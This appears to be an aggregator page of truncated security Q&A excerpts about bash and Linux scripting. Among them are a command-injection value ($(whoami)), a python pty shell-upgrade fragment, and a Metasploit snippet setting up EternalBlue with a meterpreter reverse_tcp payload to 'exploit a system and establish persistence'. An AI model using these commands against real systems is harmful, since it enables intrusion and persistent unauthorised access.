Collaborate Disseminate
If $1 contains untrusted user input for example $(whoami). Are any of the following bash examples vulnerable to command injection?
I’m having issues clearly understanding this behavior in Bash. Also, I have issues with echo -n "$1&quo… Continue reading Are these bash lines (handling untrusted user input) vulnerable to command injection?
i wanna execute ls command inplace of the output being "your name is ls"
is there a way to do it ?
read -p "name??" name
echo "your name is $name"
I noticed, that the direct download link to the whole list as an archive has vanished from the page at https://haveibeenpwned.com/Passwords .
It now refers to the PwnedPasswordsDownloader git-repo which offers a Windows dotNet Tool. But I … Continue reading How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]
i have w wordlist of subdomains contains like this :
admin.bugbountytarget.com
portal.bugbountytarget.com
sales.bugbountytarget.com
vpn1.bugbountytarget.com
dev.test.bugbountytarget.com
…
And I want to grep subdomains names without &quo… Continue reading How i can grep only subdomain names without "target.com" [closed]
For an embedded IoT product running linux, digital signature validation of new firmware package is performed by a startup script file. For maintenance and troubleshooting purposes, the product does support a user account. As in the case of… Continue reading Obfuscation of scripts
I asked this at https://apple.stackexchange.com/questions/445343/macapps-link-possible-attack-vector-could-you-pipe-through-some-security-scr but I think this would be more appropriate place.
A work colleague said she is using https://maca… Continue reading macapps.link – possible attack vector – could you pipe through some security script
The thing is i use ZSH and we all know the steps to go to a full interactive shell, so I would like to have these commands in a script so that when I call it in an alias these steps are executed.
python3 -c ‘import pty; pty.spawn("/bi… Continue reading How can I have this in a bash script [migrated]
Based on my requirement of dev sever ,I have Created a Linux function that will create dev user( we have an group name developer and that group have the permission of “group:devs:r-x”).
as per my requirement (Take the users’s first name a… Continue reading New User creation & SSH Issue Linux script
Since I am new to Linux, when writing scripts I always followed the rule "the less code, the less attack surface", so I try to write scripts with privileged access (sudo, root, etc.) in sh and use less third-party programs (grep,… Continue reading BASH vs SH (dash, etc.) in terms of security
Working on a quick and easy script to exploit a system and establish persistence. To do so I have written 2 .rc scripts
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp<
set rhost 156.156.1…. Continue reading How do you place sequential metasploit rc scripts into a standard linux script [closed]